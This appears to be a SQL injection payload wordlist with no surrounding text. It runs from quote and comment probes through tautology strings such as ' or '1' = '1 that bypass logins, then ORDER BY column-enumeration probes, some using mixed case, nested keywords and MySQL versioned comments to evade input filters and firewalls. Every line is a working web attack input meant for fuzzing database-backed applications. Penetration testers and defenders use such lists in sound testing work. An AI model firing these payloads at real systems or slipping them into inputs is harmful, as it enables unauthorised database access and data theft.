"\
`\
-- -\
#\
/*\
;\
1 or 1 = 1\
1 or 1 = 1 -- -\
1 or 1 = 1 #\
1 or 1 = 1 /*\
1) or (1 = 1\
1) or (1 = 1 -- -\
1) or (1 = 1 #\
1) or (1 = 1 /*\
1) or (1) = (1\
1) or (1) = (1 -- -\
1) or (1) = (1 #\
1) or (1) = (1 /*\
1 -- -\
1 #\
1 /*\
1) -- -\
1) #\
1) /*\
' or '1' = '1\
' or '1' = '1' -- -\
' or '1' = '1' #\
' or '1' = '1' /*\
') or ('1' = '1\
') or ('1') = ('1\
" or "1" = "1\
") or ("1" = "1\
") or ("1") = ("1\
' -- -\
" -- -\
' #\
" #\
' /*\
" /*\
') -- -\
") -- -\
') #\
") #\
') /*\
") /*\
')) -- -\
")) -- -\
')) #\
")) #\
')) /*\
")) /*\
) -- -\
) #\
) /*\
)) -- -\
)) #\
)) /*\
' and '1' = '1\
' and '1' = '1' -- -\
' and '1' = '1' #\
' and '1' = '1' /*\
') and ('1' = '1\
') and ('1') = ('1\
" and "1" = "1\
") and ("1" = "1\
") and ("1") = ("1\
1 and 1 = 1\
1 and 1 = 1 -- -\
1 and 1 = 1 #\
1 and 1 = 1 /*\
1) and (1 = 1\
1) and (1 = 1 -- -\
1) and (1 = 1 #\
1) and (1 = 1 /*\
1) and (1) = (1\
1) and (1) = (1 -- -\
1) and (1) = (1 #\
1) and (1) = (1 /*\
' || '1' = '1\
' || '1' = '1' -- -\
' || '1' = '1' #\
' || '1' = '1' /*\
') || ('1' = '1\
') || ('1') = ('1\
" || "1" = "1\
") || ("1" = "1\
") || ("1") = ("1\
1 || 1 = 1\
1 || 1 = 1 -- -\
1 || 1 = 1 #\
1 || 1 = 1 /*\
1) || (1 = 1\
1) || (1 = 1 -- -\
1) || (1 = 1 #\
1) || (1 = 1 /*\
1) || (1) = (1\
1) || (1) = (1 -- -\
1) || (1) = (1 #\
1) || (1) = (1 /*\
' && '1' = '1\
' && '1' = '1' -- -\
' && '1' = '1' #\
' && '1' = '1' /*\
') && ('1' = '1\
') && ('1') = ('1\
" && "1" = "1\
") && ("1" = "1\
") && ("1") = ("1\
1 && 1 = 1\
1 && 1 = 1 -- -\
1 && 1 = 1 #\
1 && 1 = 1 /*\
1) && (1 = 1\
1) && (1 = 1 -- -\
1) && (1 = 1 #\
1) && (1 = 1 /*\
1) && (1) = (1\
1) && (1) = (1 -- -\
1) && (1) = (1 #\
1) && (1) = (1 /*\
' orDeR by 1 -- -\
' orDeR by 1 #\
' orDeR by 1 /*\
' orDeR by 1337 -- -\
' ordeR by 1337 #\
' ordeR by 1337 /*\
" orDeR by 1 -- -\
" orDeR by 1 #\
" orDeR by 1 /*\
" orDeR by 1337 -- -\
" ordeR by 1337 #\
" ordeR by 1337 /*\
') orDeR by 1 -- -\
') orDeR by 1 #\
') orDeR by 1 /*\
') orDeR by 1337 -- -\
') ordeR by 1337 #\
') ordeR by 1337 /*\
") orDeR by 1 -- -\
") orDeR by 1 #\
") orDeR by 1 /*\
") orDeR by 1337 -- -\
") ordeR by 1337 #\
") ordeR by 1337 /*\
' orORDeRdeR by 1 -- -\
' orORDeRdeR by 1 #\
' orORDeRdeR by 1 /*\
' orORDeRdeR by 1337 -- -\
' orORDeRdeR by 1337 #\
' orORDeRdeR by 1337 /*\
" orORDeRdeR by 1 -- -\
" orORDeRdeR by 1 #\
" orORDeRdeR by 1 /*\
" orORDeRdeR by 1337 -- -\
" orORDeRdeR by 1337 #\
" orORDeRdeR by 1337 /*\
') orORDeRdeR by 1 -- -\
') orORDeRdeR by 1 #\
') orORDeRdeR by 1 /*\
') orORDeRdeR by 1337 -- -\
') orORDeRdeR by 1337 #\
') orORDeRdeR by 1337 /*\
") orORDeRdeR by 1 -- -\
") orORDeRdeR by 1 #\
") orORDeRdeR by 1 /*\
") orORDeRdeR by 1337 -- -\
") orORDeRdeR by 1337 #\
") orORDeRdeR by 1337 /*'\
' /*!ORDER BY*/ 1 -- -\
' /*!ORDER BY*/ 1 #\
' /*!ORDER BY*/ 1 /*\
' /*!ORDER BY*/ 1337 -- -\
' /*!ORDER BY*/ 1337 #\
' /*!ORDER BY*/ 1337 /*\
" /*!ORDER BY*/ 1 -- -\
" /*!ORDER BY*/ 1 #\
" /*!ORDER BY*/ 1 /*\
" /*!ORDER BY*/ 1337 -- -\
" /*!ORDER BY*/ 1337 #\
" /*!ORDER BY*/ 1337 /*\
') /*!ORDER BY*/ 1 -- -\
') /*!ORDER BY*/ 1 #\
') /*!ORDER BY*/ 1 /*\
') /*!ORDER BY*/ 1337 -- -\
') /*!ORDER BY*/ 1337 #\
') /*!ORDER BY*/ 1337 /*\
") /*!ORDER BY*/ 1 -- -\
") /*!ORDER BY*/ 1 #\
") /*!ORDER BY*/ 1 /*\
") /*!ORDER BY*/ 1337 -- -\
") /*!ORDER BY*/ 1337 #\
") /*!ORDER BY*/ 1337 /*\
' /*!50000ORDER*//**//*!50000BY*/ 1 -- -\
' /*!50000ORDER*//**//*!50000BY*/ 1 #\
' /*!50000ORDER*//**//*!50000BY*/ 1 /*\
' /*!50000ORDER*//**//*!50000BY*/ 1337 -- -\
' /*!50000ORDER*//**//*!50000BY*/ 1337 #\
' /*!50000ORDER*//**//*!50000BY*/ 1337 /*\
" /*!50000ORDER*//**//*!50000BY*/ 1 -- -\
" /*!50000ORDER*//**//*!50000BY*/ 1 #\
" /*!50000ORDER*//**//*!50000BY*/ 1 /*\
" /*!50000ORDER*//**//*!50000BY*/ 1337 -- -\
" /*!50000ORDER*//**//*!50000BY*/ 1337 #\
" /*!50000ORDER*//**//*!50000BY*/ 1337 /*\
') /*!50000ORDER*//**//*!50000BY*/ 1 -- -\
') /*!50000ORDER*//**//*!50000BY*/ 1 #\
') /*!50000ORDER*//**//*!50000BY*/ 1 /*\
') /*!50000ORDER*//**//*!50000BY*/ 1337 -- -\
') /*!50000ORDER*//**//*!50000BY*/ 1337 #\
') /*!50000ORDER*//**//*!50000BY*/ 1337 /*\
") /*!50000ORDER*//**//*!50000BY*/ 1 -- -\
") /*!50000ORDER*//**//*!50000BY*/ 1 #\
") /*!50000ORDER*//**//*!50000BY*/ 1 /*\
